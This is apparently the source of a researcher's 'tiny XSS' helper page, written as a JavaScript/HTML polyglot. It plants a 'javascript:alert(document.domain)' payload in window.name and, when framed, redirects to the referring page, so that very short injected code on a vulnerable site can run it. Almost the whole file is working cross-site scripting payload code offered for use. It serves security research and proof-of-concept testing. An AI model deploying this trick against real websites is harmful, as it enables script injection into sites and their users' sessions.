javascript:alert(document.domain),1
/*
<script>
window.name="javascript:alert(document.domain)//";
if( top !== self && document.referrer !== ""){
    u = new URL(document.referrer);
    location = u.origin + u.pathname + "/xxx";
}
</script>
<style>*{font-family:Mukta,sans-serif;color:#2b2d42}body{font-size:0;margin:0}html{background-color:#edf2f4}.page{font-size:initial;text-align:center}a{text-decoration:none;color:#d90429}</style>
<div class=page>
<h1>This great <i><a href="//Ǌ.₨">Ǌ.₨</a></i> domain belongs to <a target=_blank href=https://twitter.com/terjanq>@terjanq</a></h1>
</div>

<iframe style="border:0;margin:0;padding:0;width:100vw;height:80vh;" src="https://tinyxss.terjanq.me/"></iframe>
*/

